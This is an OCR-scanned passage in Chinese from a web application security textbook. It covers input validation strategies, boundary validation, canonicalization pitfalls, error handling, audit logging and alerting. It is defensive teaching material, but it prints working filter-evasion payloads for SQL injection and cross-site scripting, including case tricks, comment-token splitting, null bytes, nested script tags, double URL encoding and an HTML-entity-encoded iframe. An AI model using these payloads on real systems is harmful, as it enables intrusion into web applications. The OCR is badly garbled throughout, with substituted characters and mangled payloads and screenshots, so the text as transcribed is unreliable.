入 ， 有 时 最 好 结合 采用 几 种 方法 。 

1. “拒绝 已 知 的 不 恨 输入 ” 

这 种 方法 一 般 使 用 一 个 黑 名 单 ， 其 中 包含 一 组 在 攻击 中 使 用 的 已 知 的 字面 量 字 符 串 或 模式 。 
确认 机 制 阻 止 任何 与 黑 名 单 匹 配 的 数据 ， 并 接受 其 他 数据 。 

一 般 来 说 ， 因 为 两 方面 的 主要 原因 ， 这 种 方法 是 确认 用 户 输 入 效率 最 低 的 方法 。 首 先 ， 攻击 
者 可 通过 一 系列 输入 对 典型 Web 应 用 程序 中 存在 的 漏洞 加 以 利用 , 这 些 输入 可 通过 各 种 方式 进行 
编码 ,或 者 表现 为 不 同 的 形式 。 除 非 在 最 简单 的 情况 下 ， 否则 ， 黑 名 单 可 能 会 忽略 某 些 可 用 于 攻 
击 应 用 程序 的 输入 模式 。 其 次 ,攻击 技术 处 在 不 断 发 展 的 过 程 之 中 。 当 前 的 黑 名 单 无 法 防止 利用 
现 有 漏洞 的 新 型 方法 。 

通过 对 被 阻止 的 输入 稍 做 调整 ， 即 可 轻易 避 开 许多 基于 黑 名 单 的 过 滤 。 例 如 : 

口 如 果 sELECT 被 阻止 ， 则 尝试 SseLect; 

口 如 果 or 1=1-- 被 阻止 ， 则 党 试 or 2=2--; 

口 如 果 alert ('xss') 被 阻止 ， 则 尝试 prompt ('xss')。 
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在 其 他 情况 下 , 通过 在 表达 式 之 间 使 用 非 标准 字符 破坏 应 用 程序 执行 的 令 牌 , 可 以 避 开 下 在 
阻止 特定 关键 子 的 过 滤 。 例 如 : 


SELECT/*foo*/username,pPassword/*foo*/FROM/*foo*/users 


<imog%09onerror-alert(1) src-=-a> 

最 后 ， 各 种 基于 黑 名 单 的 过 滤 ， 特 别 是 那些 由 Web 应 用 程序 防火 场 执 行 的 过 滤 ， 都 多 受 空 字 
节 攻 击 。 由 于 在 托管 和 非 托 管 情况 下 处 理 字 符 串 的 方式 各 不 相同 , 在 被 阻止 的 表达 式 之 前 的 任何 
位 置 插 入 空 人 学 市 可 能 导致 某 些 过 滤 带 集 止 处 理 输入 ， 并 因此 无 法 确定 表达 式 。 例 如 : 

%SO0<script>alert (1)</script> 


我 们 将 在 第 18 章 介绍 各 种 攻击 Web 应 用 程序 防火 墙 的 其 他 技巧 。 











注解 ”对 空 字 节 的 处 理 方式 加 以 利用 的 攻击 存在 于 Web 应 用 程序 安全 的 各 个 领域 。 在 
空 字 节 被 当做 字符 串 分 隔 符 的 情况 下 ， 空 字 节 可 用 于 终止 文件 名 或 对 某 个 后 端 组 件 的 


查询 。 在 接受 并 忽略 空 字 节 的 情况 下 (例如 ， 在 某 些 浏览 器 的 HTML 代码 中 )， 可 以 在 


被 阻止 的 表达 式 中 插入 任意 空 字 节 ， 以 避 开 基于 黑 名 单 的 过 滤 。 这 类 攻击 将 在 后 面 几 
章 详细 介绍 


9 -Po 





2. “接受 已 知 的 正常 输入 ” 

这 种 方法 使 用 一 个 日 名 单 ， 基 中 包含 仅 与 民 性 输入 匹配 的 一 组 字面 量 字 符 串 、 模 式 或 一 组 标 
准 。 确 愉 机 制 接受 任何 与 日 名 单 匹 配 的 数据 ， 并 阻止 其 他 数据 。 例 如 ， 在 数据 库 中 查询 所 需 的 产 
品 代码 时 , 应 用 程序 可 能 会 确认 其 仅 包含 字母 数字 字符 , 长 度 正 好 为 6 个 字符 。 根 据 随后 对 产品 代 
码 进行 的 处 理 ， 开 发 者 知道 通过 这 种 测试 的 输入 不 会 造成 任何 问题 。 

在 切实 可 行 的 情况 下 , 这 种 方法 是 处 理 潜在 恶意 输入 的 最 有 效 方法 。 因 为 在 制定 日 名 单 时 已 
经 非常 小 心 , 所 以 攻击 者 无 法 使 用 专门 设计 的 输入 来 干扰 应 用 程序 的 行为 。 然而 , 在 许多 情况 下 ， 
应 用 程序 必须 接受 并 不 满足 任何 已 知 “ 正 常 ”标准 的 数据 ， 并 对 其 进行 处 理 。 例 如 ， 在 一 些 人 的 
姓名 中 包含 撤 号 和 连 字 符 的 情况 。 这 些 数据 可 用 于 对 数据 库 发 动 攻击 。 但 也 可 能 存在 这 样 的 要 求 ， 
即 应 用 程序 应 允许 任何 人 以 真实 姓名 注册 。 因 此 , 虽然 这 种 方法 极其 有 效 , 但 基于 日 名 蛙 的 方法 
并 非 是 解决 处 理 用 户 输入 问题 的 万 能 办 法 。 

3. 净化 

这 种 方法 认可 有 时 需要 接受 无 法 保证 其 安全 的 数据 。 应 用 程序 并 不 拒绝 这 种 输入 ,相反 ,， 它 
以 各 种 方式 对 其 进行 净化 , 防止 它 造成 任何 不 利 的 影响 。 数 据 中 可 能 存在 的 恶意 字符 被 彻底 删除 
掉 ， 只 留 下 已 知 安全 的 字符 ， 或 者 在 进一步 处 理 前 对 它们 进行 适当 编码 或 “ 转 义 ”。 

基于 数据 净化 的 方法 一 般 非 常 有 效 。 在 许多 情况 下 , 可 将 其 作为 处 理 亚 意 输 入 问题 的 通用 解 
决 办 法 。 例 如 ， 在 将 危险 字符 植 人 应 用 程序 页 面前 对 其 进行 HTML 编 权 ,， 是 防御 路 站 点 脚本 攻击 
的 第 用 方法 ( 请 参阅 第 12 革 了 解 相关 内 容 )。 然 而 ， 如 果 震 要 在 一 个 输入 项 中 容纳 几 种 可 能 的 恶 
意 数据 ， 可 能 就 很 难 对 其 进行 有 将 的 净化 。 这 时 ， 最 好 采用 边界 确认 方法 处 理 用 户 输入 ， 如 后 文 
所 述 。 
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4. 安全 数据 处 理 

以 不 安全 的 方式 处 理 用 户 提 交 的 数据 ， 是 许多 Web 应 用 程序 汤 洞 形成 的 根本 原因 。 通 第 ,不 
需要 确认 输入 本 号， 只 需 确 保 处 理 过 程 绝 对 安全 ， 即 可 避免 这 些 漏 洞 。 有 些 时候 ， 可 使 用 安全 的 
编程 方法 避免 常见 问题 。 例 如 ,在 数据 库 访问 过 程 中 正确 使 用 参数 化 奋 询 ， 就 可 以 避免 SQL 注入 
攻击 〈 请 参阅 第 9 蔓 了 解 相 关内 容 )。 在 其 他 情况 下 ,完全 可 以 避免 应 用 程序 功能 设计 不 安全 的 做 
法 ， 如 向 操作 系统 命令 解释 程序 提交 用 户 输 入 。 

这 种 方法 并 不 适用 于 Web 应 用 程序 党 要 执行 的 每 项 任务 , 但 如 果 适 用 ， 它 是 一 种 有 效 人 处理 洪 
在 恶意 输入 的 通用 方法 。 

5. 语法 检查 

迄今 为 止 , 本 书 描述 的 防御 措施 全 都 用 于 防止 应 用 程序 接受 各 种 错误 的 输入 , 攻击 者 专门 设 
计 这 些 输入 的 内 容 以 干扰 应 用 程序 的 处 理 过 程 。 然 而 ,在 一 些 汤 洞 中 ,攻击 者 提交 的 输入 与 普通 
的 韭 恶 意 用 户 提 交 的 输入 完全 相同 。 之 所 以 称 其 为 屎 意 输入 ,是 因为 攻击 者 提交 的 动机 不 同 。 例 
如 ， 攻 击 者 可 能 会 修改 通过 隐藏 表单 字段 提交 的 账号 ， 企 图 访问 其 他 用 户 的 银行 账户 。 这 时 ， 再 
多 的 语法 确认 也 无 法 区 别 用 户 与 攻击 者 的 数据 。 为 防止 未 授权 访问 ,应 用 程序 必须 确认 所 提交 的 
账号 属于 之 前 提交 该 账号 的 用 户 。 


2.2.3 ”边界 确认 


在 信任 边界 确认 数据 的 做 法 并 不 少见 。 用 户 提 交 的 数据 不 可 信和 是 造成 Web 应 用 程序 核心 安全 
问题 的 主要 原因 。 虽然 在 客户 曾 执 行 的 输入 确认 检查 可 以 提高 性 能 ,改善 用 户 体 验 , 但 它们 并 不 
能 为 实际 到 达 服 务 俘 的 数据 提供 任何 保证 。 服务 各 端 应 用 程序 第 一 次 收 到 用 户 数据 的 地 方 是 一 个 
重要 的 信任 边界 ， 应 用 程序 需要 在 此 采取 措施 防御 恶意 输入 。 

鉴于 核心 问题 的 本 质 ， 可 以 基于 因特网 ( “不 恨 ” 且 不 可 信 ) 与 服务 带 问 应 用 程序 (“正常 ” 
且 可 信 ) 之 间 的 边界 来 考虑 输入 确认 问题 。 从 这 个 角度 看 ,输入 确认 的 任务 就 是 准 化 到 达 的 海 在 
恶意 数据 ， 然 后 将 “洁净 的 ”数据 提交 给 可 信 的 应 用 程序 。 此 后 ,数据 即 属于 可 信和 数据 ， 不 需要 
任何 进一步 的 检查 或 担心 可 能 的 攻击 ， 即 可 进行 处 理 。 

很 明显 , 当 我 们 开始 分 析 一 些 实际 的 疡 洞 时 , 执行 这 种 简单 的 输入 确认 是 不 够 的 , 原因 如 下 。 

口 基于 应 用 程序 所 执行 功能 的 广泛 性 以 及 其 所 采用 技术 的 多 样 性 ， 一 个 典型 的 应 用 程序 第 

要 防御 大 量 各 种 各 梓 的 基于 输入 的 攻击 ， 且 每 种 攻击 可 能 采用 一 组 截然 不 同 的 专门 设计 
的 数据 。 因 此 ， 很 难 在 外 部 边界 建立 一 个 单独 的 机 制 ， 防 御所 有 这 些 攻击 。 

口 许多 应 用 程序 功能 部 涉及 组 合 一 系列 不 同类 型 的 处 理 过 程 。 用 户 提 交 的 一 项 输入 可 能 会 
在 不 同 的 组 件 中 引发 许多 操作 ， 其 中 前 一 个 操作 的 输出 结 末 被 用 于 后 一 个 操作 的 输入 。 
数据 发 生 转 换 后 ， 可 能 会 变 得 与 原始 的 输入 完全 不 同 。 而 经 验 丰富 的 攻击 者 能 够 探 纵 应 
用 程序 ， 在 关键 处 理 阶 段 生成 恶意 输入 ， 攻 击 接收 这 些 数 据 的 组 件 。 为 此 ， 很 难 在 外 部 
边界 执行 确认 机 制 ， 预 测 每 一 个 用 户 输 入 的 全 部 可 能 处 理 结 

口 防御 不 同类 型 的 基于 输入 的 攻击 可 能 需要 对 相互 矛盾 的 用 户 输入 执行 各 种 确认 检查 。 例 
如 ,防止 跨 站 点 脚本 攻击 可 能 需要 将 > 字符 HTML 编码 为 zgt;， 而 防止 命令 注入 攻击 则 
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需要 阻止 包含 & 与 ;字符 的 输入 。 有 时 候 ， 想 要 在 应 用 程序 的 外 部 边界 同时 阻止 所 有 类 型 
的 攻击 几乎 是 不 可 能 的 事情 。 
边界 确认 (boundary validation ) 是 一 种 更 加 有 效 的 模型 。 此 时 ， 服 务 锅 端 应 用 程序 的 每 一 个 
单独 的 组 件 或 功能 单元 将 其 输入 当做 来 自 潜 在 恶意 来 源 的 输入 对 待 。 除 客户 端 与 服务 器 之 间 的 外 
部 边界 外 , 应 用 程序 在 上 述 每 一 个 信任 边界 上 执行 数据 确认 。 这 种 模型 为 前 面 提 出 的 问题 提供 了 
一 个 解决 方案 。 每 个 组 件 都 可 以 防御 它 收 到 的 特殊 类 型 的 专门 设计 的 输入 。 当 数据 通过 不 同 的 组 
件 时 ， 即 可 对 前 面 转换 过 程 中 生成 的 任意 数据 值 执 行 确认 检查 。 而 且 ,， 由 于 在 不 同 的 处 理 阶段 执 
行 不 同 的 确认 检查 ， 它 们 之 间 不 可 能 发 生 冲 突 。 
图 2-$ 说 明了 一 种 典型 情况 ， 此 时 边界 确认 是 防御 恶意 输入 的 最 有 效 方法 。 在 用 户 登 录 过 程 
中 ， 需 要 对 用 户 提 区 的 输入 进行 儿 个 步骤 的 处 理 ， 并 在 每 个 步骤 执行 适当 的 确认 检查 。 
(1) 应 用 程序 收 到 用 户 的 登录 信息 。 表 单 处 理 程序 确认 每 个 输入 仅 包 含 合法 字符 ， 符 合 特殊 
的 长 度 限 制 ， 并 且 不 包含 任何 已 知 的 攻击 签名 。 
(2) 应 用 程序 执行 一 个 SQL 查询 检验 用 户 证 书 。 为 防止 SQL 注入 攻击 ， 在 执行 查询 前 ， 应 用 
程序 应 对 用 户 输入 中 包含 的 可 用 于 攻击 数据 库 的 所 有 字符 进行 转 义 。 
(3) 如 采用 户 成 功 登 录 ， 应 用 程序 再 将 用 户 资 料 中 的 某 些 数据 传送 给 SOAP 服 务 ， 进 一 步 获 
得 用 户 账 户 的 有 关 信 息 。 为 防止 SOAP 注 入 攻击 ， 需 要 对 用 户 资 料 中 的 任何 XML 元 字符 进行 适 
当 编 码 。 
(4) 应 用 程序 在 用 户 的 浏览 妖 中 显示 用 户 的 账户 信息 。 为 防止 跨 站 点 脚本 攻击 ， 应 用 程序 对 
植 入 返回 页 面 的 任何 用 户 提 交 的 数据 执行 HTML 编 码 。 
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SOAP 服 务 
图 2-5 ”一 种 在 多 阶段 处 理 步 又 中 使 用 边界 确认 的 应 用 程序 功能 
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我 们 将 在 后 续 章 节 详 细 介绍 上 文 描述 的 特殊 漏洞 和 防御 机 制 。 如 果 这 一 功能 发 生变 化 , 需要 
器 其 他 应 用 程序 组 件 提 交 数 据 , 那么 可 能 需要 在 相关 信任 边界 执行 类 似 的 防御 。 例 如 ， 如 采 登 录 
失败 致使 应 用 程序 辐 用 户 发 送 警 告 电子 邮件 , 那么 可 能 需要 检查 合并 到 电子 邮件 中 的 所 有 用 户 数 
据 ， 防 止 SMTP 注 入 攻击 。 


2.2.4 多 步 确认 与 规范 化 


在 确认 检查 过 程 中 , 当 需 要 在 几 个 步骤 中 处 理 用 户 提交 的 输入 时 ,就 会 出 现 一 个 输入 处 理 机 
制 经 常 遇 到 的 问题 。 如 果 不 间 层 处 理 这 个 过 程 ， 那 么 攻击 者 就 能 够 建立 专门 设计 的 输入 , 使 恶意 
数据 成 功 避 开 确 认 机 制 。 当 应 用 程序 试图 通过 删除 或 编码 某 些 凶 符 或 表达 式 兆 化 用 户 输 入 时 , 就 
会 出 现 这 种 问题 。 例 如 ， 为 防御 某 些 蜂 站 点 脚本 攻击 ,应 用 程序 可 能 会 从 任何 用 户 提交 的 数据 中 
删 际 表达 式 : 

<ScCript> 
但 攻击 者 可 通过 应 用 以 下 输入 避 开 过 滤 硕 : 

<ScCr<script>1ipt> 
由 于 过 滤 无 法 递归 运行 ,删除 被 阻止 的 表达 式 后 ， 表 达 式 周围 的 数据 又 合并 在 一 起 ， 重新 建立 恶 
意 表达 式 。 

同样 ， 如 采 对 用 户 输 入 执行 几 个 确认 步 恕 ， 攻 击 者 就 可 以 利用 这 些 步 又 的 顺序 来 避 开 过 滤 。 
例如 ， 如 果 应 用 程序 首先 递归 删除 . ./， 然 后 递归 删除 .\， 就 可 以 使 用 以 下 输入 避 开 确认 检查 : 

wi 

数据 规范 化 〈data canonicalization ) 会 造成 为 一 个 问题 。 当 用 户 浏览 疾 送 出 输入 时 ， 它 可 对 
这 些 输 入 进行 各 种 形式 的 编码 。 之 所 以 使 用 这 些 编码 方 宁 ， 是 为 了 能 够 通过 HTTP 安 全 传送 不 常 
见 的 字符 与 二 进 制 数 据 (请 参阅 第 3 草 了 解 更 多 详情 ), 规范 化 是 指 将 数据 转换 或 解码 成 一 个 和 常见 
字符 集 的 过 程 。 如 采 在 实施 输入 过 滤 之 后 才 执行 规范 化 , 那么 攻击 者 就 可 以 通过 使 用 编码 避 开 确 
认 机 制 。 

例如 ， 应 用 程序 可 能 会 从 用 户 输 入 中 删除 省 略 号 ， 以 防止 菜 些 SQL 注 和 攻击。 但是， 如 采 应 
用 程序 随后 对 净化 后 的 数据 进行 规范 化 ， 那 么 攻击 者 就 可 以 使 用 URL 编 码 的 输入 避 开 确认 : 

%2527 
收 到 该 输入 后 ， 应 用 程序 服务 帮会 执行 正常 的 URL 解 码 ， 因 此 该 输入 变 为 : 

%27 
其 中 并 不 包含 省 略 写 ， 因 此， 应 用 程序 的 过 滤 带 允许 该 输入 。 但 是 ， 如 有 果 应 用 程序 执行 进一步 的 
URL 人 解码， 该 输入 将 变 为 省 略 号 ， 从 而 避 开 过 小 。 

如 采 应 用 程序 删除 而 不 是 阻止 省 略 号 , 然后 执行 进一步 的 规范 化 , 则 可 以 使 用 以 下 输入 避 开 
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值得 注意 的 是 ， 在 这 些 情况 下 ， 应 用 程序 服务 帝 问 不 一 定 会 执行 多 步 确认 和 规范 化 。 例 如 ， 
在 下 面 的 输入 中 ， 几 个 字符 已 被 HTML 编 但 : 

<iframe src=j&#x61;vasc&Hx72ipt&gtx3a;alert&Hix28;1&#x29; > 

如 果 服 务 需 端 应 用 程序 使 用 输入 过 滤 来 阻止 某 些 J avaScript 表 达 式 和 字符 ,该 已 编码 的 输入 束 
可 以 成 功 避 开 过 滤 。 但 是 ， 如 采 该 输入 随后 被 复制 到 应 用 程序 的 响应 中 ， 某 些 浏览 硕 将 对 src 参 
数值 执行 HTML 解 人 码 ， 般 入 的 JavaScript 将 得 以 执行 。 

除了 供 Web 应 用 程序 使 用 的 标准 编码 方案 外 ， 其 他 情况 下 ， 如 采 应 用 程序 采用 的 组 件 将 数据 
从 一 个 字符 集 转换 为 另 一 个 字符 集 ， 这 也 会 导致 规范 化 问题 。 例 如 ， 某 些 技术 会 基于 印刷 字形 的 
相似 性 ， 对 字符 执行 “最 佳 ” 英 射 。 这 时 ， 字 符 << 和 >> 分 别 被 转换 为 < 和 >， 立 和 A 则 被 转换 为 Y 
和 A。 攻 击 者 经 党 利用 这 种 方法 传送 受阻 止 的 学 符 或 关键 学 ， 从 而 避 开 应 用 程序 的 输入 过 小 。 

本 书 将 详细 介绍 这 类 攻击 ,它们 可 有 效 挫 败 应 用 程序 针对 常见 的 基于 输入 的 漏洞 而 采取 的 许 
多 防御 机 制 。 

有 时 候 ， 可 能 很 难 避 免 多 步 确 认 与 规范 化 造成 的 问题 ， 也 不 存在 解决 这 类 问题 的 唯一 方案 。 
一 种 解决 办 法 是 递归 执行 净化 操作 ， 和 到 无 法 进一步 修改 输入 。 然而， 如 采 和 需要 在 净化 过 程 中 对 
一 个 存在 疑问 的 字符 进行 转 义 ,那么 这 种 情况 可 能 会 造成 无 限 循环 。 通常 ,这 个 问题 只 有 根据 具 
体 情 况 、 基 于 所 执行 的 确认 类 型 加 以 解决 。 如 果 可 能 ， 最 好 避免 净化 某 些 不 恨 输 入 的 做 法 ,完全 
拒绝 这 种 类 型 的 输入 。 


2.3 ”处理 攻击 者 


任何 设计 安全 应 用 程序 的 开发 人 员 必 须 基 于 这 样 一 个 假设 :应 用 程序 将 成 为 蓄意 破坏 旦 经验 丰 
军 的 攻击 者 的 直接 攻 击 目标 。 能 够 以 党 欣 的 方式 处 理 并 应 对 这 些 攻击 , 是 应 用 程序 安全 机 制 的 一 项 
主要 功能 。 这些 机 制 通常 结合 使 用 一 系列 防御 与 攻击 措施 ,以 尽 可 能 地 阻止 攻击 者 , 并 就 所 发 生 的 
事件 ,通知 应 用 程序 所 有 者 以 及 提供 相应 的 证 据 。 为 处 理 攻击 者 而 采取 的 措施 一 般 由 以 下 任务 组 成 : 

口 处 理 错误 ; 

口 维护 审计 日 志 ; 

口 问 管 理 员 发 出 警报 ; 

口 应 对 攻击 。 


2.3.1 处理 错误 


不 管 应 用 程序 开发 者 在 确认 用 户 输 入 时 多 么 小 心 , 还 是 儿 乎 可 以 肯定 会 出 现 一 些 无 法 预料 的 
错误 。 功能 与 用 户 验 收 测试 过 程 能 够 查 明 普 通用 户 行 为 造成 的 错误 , 在 生产 环境 中 部 著 应 用 程序 
前 应 当 考 虑 到 这 一 因素 。 然 而 ,我 们 无 法 预测 恶意 用 户 与 应 用 程序 交互 的 每 一 种 可 能 方式 , 并 且 
当 应 用 程序 遭受 攻击 时 肯定 会 出 现 其 他 错误 。 

应 用 程序 的 一 个 关键 防御 机 制 是 合理 地 处 理 无 法 预料 的 错误 , 要 么 纠正 这 些 错误 , 要么 回 用 
户 发 送 适 当 的 错误 消息 。 在 生产 环境 下 , 应 用 程序 不 应 在 其 啊 应 中 返回 任何 系统 生成 的 消息 或 其 
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他 调试 信息 。 过 于 详细 的 错误 消息 非常 有 利于 恶意 用 户 向 应 用 程序 发 动 进一步 攻击 有些 情 况 下 ， 
攻击 者 能 够 利用 存在 缺陷 的 错误 处 理 方 法 从 错误 消息 中 获得 敏感 信息 ; 此 时 , 错误 消息 成 为 攻击 
者 从 应 用 程序 中 家 取 数据 的 重要 渠 直 。 图 2-6 显 示 了 一 个 由 无 法 处 理 的 错误 生成 的 过 于 话 细 的 错 


误 消 县 。 























ee IE 
Monila Firefox -= 
File Edt View History Bookmarks JTools Help 
多 C 人 (EE https://mdsec.net/addressbook/ "fe 3 Google PD 
,| https://mdsec.net/addressbook/ |=+e| | ~ 


[O7105/22 08:25:19.702] 

Java lang Exceptior: = | 
[07705122 08:25:19.687] SQL Exception | 三 
IORA-00921: unexpected end of SQL command SQLState: 42000 VendorError: 921 1 


select price_calc from contertowners where ownernbt= 











SQL:at org.apache.1sp. dStore_ 1sp. 1spServiceldStore 1sp.lava:l24); at 
org.apache.1asper.runtime. HttpJspBase. serwvicelHttpJspBase.Java.l37, at 

avax. servlet.http. HttpServlet. serwicelHttpServlet. Java: sd3), at 

org apache. aspetr. servlet.Jspoervlet‘Wrapper. serwiceltJspoervlet Wrapper. Java.204), at 
org.apache.Jasper. servlet. JspServlet. serwiceJspF1iletJspServlet. java.295), 








jva. lme. Exception: 
[07105122 08:25:19.687] SQL Exception 


IORA-00921: unexpected end of SQL command 
SQLState: 42000 WendorError: 921 


select price_calc ftom contertowners where ownernbt= 








SQL:at org apache.isp.dStore_jsp. jspService(dStore jsp java124); at 

org. apache.1asper.runtime. HttpJspBase. serwicelHttpJspBase.Java.l3 7 at 

avax. servlet.http. HttpServlet. serwicelHttpServlet. java853)， at 

org. apache.1asper. servlet.JspServlet Wrappetr. servicelJspServlet Wrapper.1ava204). at 
org. apache.1asper. servlet.JspServlet. serwiceJspFile(JspServlet. 1ava:295); 








Done 池 





图 2-6 “一 个 无 法 处 理 的 错误 


大 多 数 Web 开 发 语言 通过 try-catch 块 和 受 查 异常 提供 良好 的 错误 处 理 支 持 。 应 用 程序 代码 应 
广泛 使 用 这 些 方法 查 明 特 殊 与 常规 错误 ,并 做 出 相应 处 理 。 而 且 , 还 可 以 配置 大 多 数 应 用 程序 服 
务 禹 ， 使 其 以 目 定 义 的 方式 处 理 无 法 处 理 的 应 用 程序 错误 ， 如 提供 不 包含 太 多 信息 的 错误 消息 。 
请 参阅 第 15$ 章 了 解 有 关 这 些 措 施 的 更 多 详情 。 

有 效 的 错误 处 理 措施 通常 与 应 用 程序 的 日 志 机 制 整合 在 一 起 , 后 者 尽 可 能 地 记录 与 无 法 预料 
的 错误 有 关 的 调试 信息 。 通 第 ,无 法 预料 的 错误 往往 能 够 指明 应 用 程序 的 防御 机 制 中 存在 的 缺陷 。 
如 果 应 用 程序 的 所 有 者 获得 必要 的 信息 ， 就 能 从 源头 解决 这 些 问 题 。 


2.3.2 ”维护 审计 日 志 


审计 日 志 pe 在 调查 针对 应 用 程序 的 人 侵 尝 试 时 会 发 挥 很 大 作用 。 发 生 人 入 侵 后 ， 有 
效 的 审计 日 志 功 能 应 能 够 帮助 应 用 程序 所 有 者 了 解 实 际 发 生 的 情况 ， 如 哪些 漏洞 (如果 有 ) 被 加 
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以 利用 , 攻击 者 是 否 可 以 对 数据 进行 非法 访问 或 执行 任何 未 授权 的 操作 , 并 尽 可 能 地 提供 侵入 者 
的 号 份 信息 。 

在 任何 注重 安全 的 应 用 程序 中 ,日志 应 记录 所 有 重要 事件 。 一 般 这 些 事件 应 至 少 包括 以 下 几 项 。 

D 所 有 与 身份 验证 功能 有 关 的 事件 ， 如 成 功 或 失败 的 登录 、 密 码 修改 。 

口 关键 交易 ， 如 信用 卡 文 付 与 转账 。 

DO 被 访问 控制 机 制 阻 止 的 访问 企图 。 

口 任何 包含 已 知 攻击 字符 串 ， 公 人 然 表 明 亚 意 意 图 的 请 求 。 

许多 安全 性 至 天 重要 的 应 用 程序 ( 如 电子 银行 使 用 的 应 用 程序 ) 会 完整 记录 客户 闯 提 出 的 
一 个 请 求 ， 这 样 可 为 任何 事故 调查 提供 全 面 的 司法 记录 。 

有 效 的 审计 日 志 功 能 一 般 会 记录 每 个 事件 的 发 生 时 间 、 发 出 请 求 的 卫 地 址 和 用 户 的 账户 〈 如 
末 通 过 验证 ) 这 些 日 志 必 须 受到 严格 保护 ,避免 未 授权 的 读 取 或 号 入 访问 。 一 种 有 效 的 保护 方法 
征 将 审计 日 志保 存在 仪 接受 主 应 用 程序 送出 的 更 新 消息 的 目 治 系统 中 。 寺 些 情 次 下 ， 可 能 需要 将 
日 志 复 制 到 一 次 性 写 入 的 媒质 中 ， 确 保 它 们 的 完整 性 ， 以 便 在 遭受 攻击 后 进行 调查 。 

在 受 攻击 面 方面 , 保护 不 严密 的 审计 日 志 可 能 为 攻击 者 提供 大 量 信息 , 回 其 披露 许多 敏感 信 
上 县， 如 会 话 令 牌 和 请 求 参数 ， 这 些 信 息 可 能 会 使 攻击 者 能 够 立即 攻破 整个 应 用 程序 〈 见 图 2-7 )。 


> 0 DE 
留 Mozila Firefox 
File Edt View History Bookmarks JTools Help 


- = 人 全 作证 https://mdsec.net/logs/ 


,| https://mdsec.net/logs/ + 

[OS/ Mar/2007:19:31: +0D100] "POST /lx-office-erp/admin.pl HTTP/1.1" 200 i1085 mht < 
[OS/ Mar/2007:19:34: +0D100] "GET /lx-office-erp/admin.pl?action=edité&login=andre: 
[OS/ Mar/2007: 2 +0100] "POST /lx-office-erp/admin.pl HTTP/1.1" 200 2858 "ht. — 
[OS/ Mar/2007: - +0100] "POST /1lx-office-erp/login.pl HTTP/1.1" 200 5368 "hti 
[OS/ Muar /2Z2007: - - +0O100] "GET /1Lx-ULIEIiICE-ELDAIOEUUVS .D1?l1Uyin-dndir cas easswurLu 
[OS/ Mar/2007:19:35: +0D100] "GET /lx-office-erp/css/menuv3 .css?id=94273 HTTP/1.1 
[OS/Mar/2007:19:35: +0100] "GET /lx-office-erp/image/bgyg titel.gif. HTTP/1.1" 200 
[OS/ Mar/2007:19:35: +0100] "GET /lx-office-erp/ image po css menu.pnyg HTTP/1.1". 
[OS/Mar/2007:19:35: +0100] "GET /lx-office-erp/ login.pl?login=andreasg&password=: 
[OS/Mar/2007:19:35: +0100] "GET /lx-office-erp/ image/right.gif HTTP/1.1" 200 60 
[OS/ Mar/2007:19:35: +0100] "GET /lx-office-erp/ct.pl?action=searchg&level=Master: 
[OS/Mar/2007:19:35: +0100] "POST /1lx-office-erp/ct.pl HTTP/A.1" 200 14708 "http 
[OS/ Mar/2007:19:35: +0100] "GET /lx-office-erp/ar.pl?action=searchglevel=iR-—-Re: 

































































[OS/Mar/2007:19:35: +0100] "GET /lx-office-erp/ s/scalendar/calendar-win2k-1.c:™ 
Done 入 














图 2-7 保护 不 严密 、 包 含 其 他 用 户 提 交 的 敏感 信息 的 应 用 程序 日 志 





2.3.3 ”向 管理 员 发 出 警报 


审计 日 志 可 带 助 应 用 程序 所 有 者 调查 入 侵 企图 , 如 有 可 能 , 应 对 侵入 者 采取 法 律 行动 。 然 而 ， 
许多 时 候 我 们 希望 立即 采取 行动 ， 实时 啊 应 攻击 企图 。 例 如, 管理 员 可 能 会 阻止 被 攻 击 者 利用 的 
了 地 址 或 用 户 账 户 。 在 极 交情 况 下 ， 他 们 甚至 可 能 在 调查 攻击 、 采 取 补 救 措施 时 将 应 用 程序 从 网 
络 中 断 开 。 这 时 ， 即 使 攻击 者 已 经 成 功 侵入 应 用 程序 ,如果 能 够 及 时 采取 防御 措施 ， 也 可 以 将 实 
际 影响 降 到 最 低 。 
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许多 时 候 , 私 报 机 制 必须 在 两 个 相互 矛盾 的 目标 之 间 取 得 平衡 , 既 准 确 报 告 每 次 的 真实 攻击 ， 
又 不 会 生成 过 多 警报 , 造成 它们 被 管理 员 忽略 。 精 心 设计 的 报警 机 制 能 够 组 合 各 种 因 系 ， 确 定 应 
用 程序 正在 遭受 的 茶 种 攻击 ; 并 在 可 能 的 情 次 下 将 所 有 相关 事件 集中 到 一 个 警报 中 。 警报 监控 的 
有 反常 事件 一 般 包 括 以 下 儿 种 。 

口 应 用 反 第 , 如 收 到 由 单独 一 个 IP 地 址 或 用 户 发 出 的 大 量 请 求 , 表明 应 用 程序 正 受 到 目 定 义 

攻击 。 

口 交易 反常 ， 如 单独 一 个 银行 账户 所 转 入 或 转 出 的 资金 数量 出 现 寞 常 。 

口 包含 已 知 攻击 子 符 串 的 请 求 。 

口 请 求 中 普通 用 户 无 法 查看 的 数据 被 修改 。 

现 有 的 应 用 程序 防火 墙 和 和 入侵 检 测 产 品 能 够 相当 完善 地 提供 其 中 一 些 功 能 。 这 些 产 品 一 般 组 
合 应 用 一 组 基于 签名 与 异常 的 规则 来 确定 对 应 用 程序 的 恶意 利用 , 并 能 够 主动 阻止 亚 意 请 求 ， 回 
管理 员 发 出 警报 。 这 些 产 品 构成 保护 Web 应 用 程序 的 一 个 重要 防御 层 ， 当 已 知 现 有 应 用 程序 存在 
狂 润 ， 但 可 用 资源 却 无 法 修复 这 些 漏 洞 时 ， 它 们 特别 有 用 。 然 而 ， 由 于 每 个 Web 应 用 程序 都 各 不 
相同 ， 这 些 产 品 的 效用 也 往往 受到 限制 ， 其 采用 的 规则 也 因而 趋 于 一 般 化 。Web 应 用 程序 防火 增 
通常 能 够 确定 最 明显 的 攻击 ,在 这 种 攻击 中 ,攻击 者 在 每 一 个 请 求 参 数 中 提交 标准 的 攻击 字符 串 。 
然而 ,与 这 种 攻击 相 比 ,许多 攻击 往往 更 加 隐蔽 , 例如 修改 隐藏 表单 子 段 中 的 账号 来 访问 其 他 用 
户 的 数据 ， 或 者 提交 无 序 请 求 以 利用 应 用 程序 逻辑 中 存在 的 缺陷 。 在 这 些 情 况 下 ,攻击 者 提交 的 
请 求 可 能 与 善意 用 户 提 交 的 请 求 完全 相同 。 之 所 以 称 为 恶意 请 求 , 是 因为 提交 请 求 的 环境 有 所 不 
同 。 

在 任何 安全 性 至 关 重 要 的 应 用 程序 中 , 进行 实时 警报 的 最 有 效 方法 是 将 其 与 应 用 程序 的 输入 
